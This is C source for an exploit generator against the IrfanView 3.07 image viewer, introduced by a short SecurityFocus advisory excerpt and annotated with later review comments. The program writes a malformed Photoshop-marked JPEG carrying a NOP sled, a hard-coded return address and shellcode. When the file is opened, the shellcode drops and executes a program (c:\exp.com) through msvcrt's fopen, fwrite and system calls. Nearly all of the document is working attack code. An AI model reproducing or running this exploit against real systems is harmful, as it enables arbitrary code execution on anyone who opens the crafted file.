
// source: https://www.securityfocus.com/bid/781/info
IrfanView32, a freeware image viewer, mishandles JPEG files generated by Adobe Photoshop. If a .jpg file opened for viewing contains the Adobe Photoshop marker (8BPS) in its header followed by a long string, the program crashes. It is possible to insert code in the string for execution.
/*=============================================================================
Irfan View 3.07 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
/* Total size of the generated file: memset() fills this many bytes and
 * fwrite() writes exactly this many (0x22e0 = 8928). */
#define MAXBUF 0x22e0
/* Byte offset inside the file where JMPESP_ADR is stored little-endian;
 * FAKE_ADR follows at +8 and the patched exploit_code at +12. */
#define RETADR 0x31E
#define FAKE_ADR 0x80101010 // Writable buffer pointer

/* Absolute address baked into the file. It is specific to the author's
 * Windows 98 build, as the note below says, which also makes the constant a
 * stable byte pattern in files produced by this generator. */
#define JMPESP_ADR 0xbffca4f7 // You have to change this value
// for non-Japanese Windows98.
/* Four-byte marker copied to offset 0 via memcpy(buf,HEAD,4); the advisory
 * text above identifies "8BPS" as the Photoshop marker. The literal is six
 * bytes long but only the first four are used. */
#define HEAD "8BPS\0"
/*
 * Byte array that main() rewrites before use (the values are the author's;
 * they are not decoded here):
 *   - exploit_code[0x1f..0x22]                <- address of LoadLibrary
 *   - exploit_code[GetProcAddress_fcp[i]..+3] <- address of GetProcAddress
 *   - exploit_code[0x1c], [0x6d], [0x77]      <- one-byte length values
 * string_buffer is then strcat()'d onto it, so the final 0x00 of the
 * initializer is the terminator strcat()/strlen() rely on, and the 300-byte
 * size leaves room for the appended text.
 */
unsigned char exploit_code[300]={
0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};
// "exp.com"
/*
 * Second byte array; main() takes strlen() of it and strcat()s it onto
 * string_buffer after filename and "_", so it must stay NUL-terminated
 * (the initializer ends in 0x00). The author's "exp.com" label above and
 * the default filename "c:\\exp.com" are the only hints to its meaning in
 * this file -- NOTE(review): contents not decoded here.
 */
unsigned char exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};
/* Offsets into exploit_code at which main() stores the 4-byte address of
 * GetProcAddress (each offset receives bytes +0..+3). */
int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};

/* Underscore-separated text that main() extends with filename, "_" and
 * exploit_data and then appends to exploit_code; sized far beyond the
 * initializer for that reason. This program only copies the tokens and
 * measures their length. */
char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
/* Path text concatenated into string_buffer; its length is one of the
 * values patched into exploit_code. */
char filename[100] = "c:\\exp.com";
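/*
 * Program entry point: builds the PoC file described in the header comment
 * and writes it to argv[1].
 *
 * Steps, in the order the code performs them:
 *  1. buf is filled with 0x90 and the 4-byte HEAD marker ("8BPS") is copied
 *     to offset 0. A file that starts with "8BPS" and continues with a long
 *     run of identical 0x90 bytes is the recognisable shape of this
 *     generator's output.
 *  2. JMPESP_ADR is stored little-endian at RETADR..RETADR+3, the bytes
 *     0xeb 0x04 at RETADR+6/+7, and FAKE_ADR little-endian at RETADR+8..+11.
 *  3. The addresses of LoadLibrary and GetProcAddress, as resolved in *this*
 *     process, are patched into exploit_code at fixed offsets; filename,
 *     "_" and exploit_data are appended to string_buffer, which is appended
 *     to exploit_code, and length-derived single bytes are stored at 0x1c,
 *     0x6d and 0x77. The output therefore depends on the DLL layout of the
 *     machine running the generator (see the author's JMPESP_ADR note).
 *  4. The patched exploit_code is copied into buf at RETADR+12 and buf is
 *     written with fwrite().
 *
 * Changes from the original: main has an explicit int return type; buf is
 * MAXBUF+1 bytes so the zero store after memset() is in bounds (it used to
 * write one past the end, which is undefined behaviour); strlen() on the
 * unsigned char arrays goes through a char * cast; fwrite()/fclose() are
 * checked so a short or failed write is reported instead of "Done.".
 * The bytes written to the output file are unchanged.
 *
 * Returns 0 on success; exits with status 1 on a usage error or when the
 * output file cannot be opened; returns 1 when writing or closing it fails.
 */
int main(int argc,char *argv[])
{
    unsigned char buf[MAXBUF + 1],l1,l2;
    unsigned int ip,p1,p2,i;
    FILE *fp;
    size_t written;

    if (argc<2){
        printf("usage : %s outputfile\n",argv[0]);
        exit(1);
    }

    /* Filler plus marker. The terminating zero sits in the extra byte and is
     * never written out (fwrite() copies exactly MAXBUF bytes). */
    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    memcpy(buf,HEAD,4);

    /* Two hard-coded 32-bit values stored least-significant byte first. */
    ip=JMPESP_ADR;
    buf[RETADR ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[RETADR+6]=0xeb;
    buf[RETADR+7]=0x04;

    ip=FAKE_ADR;
    buf[RETADR+8]=ip&0xff;
    buf[RETADR+9]=(ip>>8)&0xff;
    buf[RETADR+10]=(ip>>16)&0xff;
    buf[RETADR+11]=(ip>>24)&0xff;

    /* Function addresses taken from this process's own image. The casts to
     * unsigned int assume 32-bit pointers, exactly as the original did. */
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x1f]=p1&0xff;
    exploit_code[0x20]=(p1>>8)&0xff;
    exploit_code[0x21]=(p1>>16)&0xff;
    exploit_code[0x22]=(p1>>24)&0xff;

    for (i=0;i<4;i++){
        exploit_code[GetProcAddress_fcp[i] ]=p2&0xff;
        exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
        exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
        exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
    }

    /* Lengths are measured before the strcat() calls and stored as single
     * bytes, so l1/l2 are deliberately unsigned char; the order of these
     * statements is what fixes the patched values. */
    l1=strlen(filename)+strlen(string_buffer);
    l2=strlen((char *)exploit_data);
    strcat(string_buffer,filename );
    strcat(string_buffer,"_" );
    strcat(string_buffer,(char *)exploit_data );
    strcat((char *)exploit_code, string_buffer );
    exploit_code[0x1c] = l1;
    exploit_code[0x6d] = l2;
    exploit_code[0x77] = l1+1;

    memcpy(buf+RETADR+12,exploit_code,strlen((char *)exploit_code));

    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("Can not write file '%s'\n",argv[1]);
        exit(1);
    }

    /* Close before judging the result so the handle is released on the
     * failure path too; a short write is reported the same way as a failed
     * close. */
    written=fwrite(buf,1,MAXBUF,fp);
    if (fclose(fp)!=0 || written!=(size_t)MAXBUF){
        printf("Can not write file '%s'\n",argv[1]);
        return 1;
    }
    printf("Done.\n");
    return 0;
}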